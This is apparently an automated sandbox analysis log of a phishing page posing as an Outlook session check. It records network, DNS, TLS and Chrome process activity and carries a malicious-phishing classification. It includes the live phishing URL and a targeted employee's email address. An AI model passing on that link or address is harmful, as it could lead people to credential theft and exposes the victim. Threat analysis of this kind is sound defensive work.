          Source: global trafficHTTP traffic detected: GET /?a=BHmXVQE9FTaR-3RZSVX6Pg&b=https%3A%2F%2Fregionsyddanmark.dk%2F&c=2101743077714141&d=1280x1024&e=https%3A%2F%2Fnew-session-outlook-com-01262025-veryfing-successfuli.pages.dev%2F&f=4B91743077714142&h=2 HTTP/1.1Host: tracking.monsido.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v1/heatmaps.js HTTP/1.1Host: heatmaps.monsido.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/cludo-component-library.esm.js HTTP/1.1Host: customer.cludo.comConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /api/v3/92/11814/websites/publicsettings? HTTP/1.1Host: api-eu1.cludo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v1/settings/BHmXVQE9FTaR-3RZSVX6Pg.json HTTP/1.1Host: heatmaps.monsido.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://regionsyddanmark.dkSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-14adbd1a.js HTTP/1.1Host: customer.cludo.comConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/cludo-component-library.esm.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?a=BHmXVQE9FTaR-3RZSVX6Pg&b=https%3A%2F%2Fregionsyddanmark.dk%2F&c=2101743077714141&d=1280x1024&e=https%3A%2F%2Fnew-session-outlook-com-01262025-veryfing-successfuli.pages.dev%2F&f=4B91743077714142&h=2 HTTP/1.1Host: tracking.monsido.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v1/settings/BHmXVQE9FTaR-3RZSVX6Pg.json HTTP/1.1Host: heatmaps.monsido.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-11043354.entry.js HTTP/1.1Host: customer.cludo.comConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-14adbd1a.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-4ded6b1b.js HTTP/1.1Host: customer.cludo.comConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-11043354.entry.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-b351486a.entry.js HTTP/1.1Host: customer.cludo.comConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-14adbd1a.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/92/11814/css/cludo-sayt.css HTTP/1.1Host: customer.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap-icons@1.10.5/font/fonts/bootstrap-icons.woff2?1fa40e8900654d2863d011707b9fb6f2 HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveOrigin: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.devsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: new-session-outlook-com-01262025-veryfing-successfuli.pages.dev
          Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: rsyd.dk
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: global trafficDNS traffic detected: DNS query: regionsyddanmark.dk
          Source: global trafficDNS traffic detected: DNS query: customer.cludo.com
          Source: global trafficDNS traffic detected: DNS query: consent.cookiebot.com
          Source: global trafficDNS traffic detected: DNS query: use.typekit.net
          Source: global trafficDNS traffic detected: DNS query: p.typekit.net
          Source: global trafficDNS traffic detected: DNS query: app-script.monsido.com
          Source: global trafficDNS traffic detected: DNS query: api-eu1.cludo.com
          Source: global trafficDNS traffic detected: DNS query: heatmaps.monsido.com
          Source: global trafficDNS traffic detected: DNS query: tracking.monsido.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
          Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
          Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
          Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
          Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
          Source: unknownHTTP traffic detected: POST /report/v4?s=3c%2FVAbRLcBaTzhLQKrM0NcT8irAyKePURded2J2oBi6p0Er3Njj5VS6rnQYsy%2FQQzoh76nzTf9FfLaOmNiYvMR7sUoMx4XW3COZ93bdhvMgjbmYkeu%2F3mzMFli11OiPliV%2BXFEz7Jy8UHexszcDXj3ba44qpA7zqYJ%2FLfwfXbCHwsy6oGKX7TQKvLF8NIFbxIGA%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 557Content-Type: application/reports+jsonOrigin: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.devUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 12:15:15 GMTContent-Length: 0Connection: closeAccess-Control-Allow-Origin: *Cache-Control: no-storereferrer-policy: strict-origin-when-cross-originReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3c%2FVAbRLcBaTzhLQKrM0NcT8irAyKePURded2J2oBi6p0Er3Njj5VS6rnQYsy%2FQQzoh76nzTf9FfLaOmNiYvMR7sUoMx4XW3COZ93bdhvMgjbmYkeu%2F3mzMFli11OiPliV%2BXFEz7Jy8UHexszcDXj3ba44qpA7zqYJ%2FLfwfXbCHwsy6oGKX7TQKvLF8NIFbxIGA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 926ecfe7cca97ca8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=89644&min_rtt=89341&rtt_var=14535&sent=7&recv=9&lost=0&retrans=0&sent_bytes=3197&recv_bytes=1304&delivery_rate=45240&cwnd=253&unsent_bytes=0&cid=b89f38a560e066f1&ts=259&x=0"
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.48.224.102:443 -> 192.168.2.16:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.5:443 -> 192.168.2.16:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.69:443 -> 192.168.2.16:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.105.146:443 -> 192.168.2.16:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.5:443 -> 192.168.2.16:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.156.103.95:443 -> 192.168.2.16:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.93.146:443 -> 192.168.2.16:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.158.47.86:443 -> 192.168.2.16:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.93.146:443 -> 192.168.2.16:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49786 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49793 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6932_2106502921
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6932_2106502921
          Source: classification engineClassification label: mal88.phis.win@26/0@77/306
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
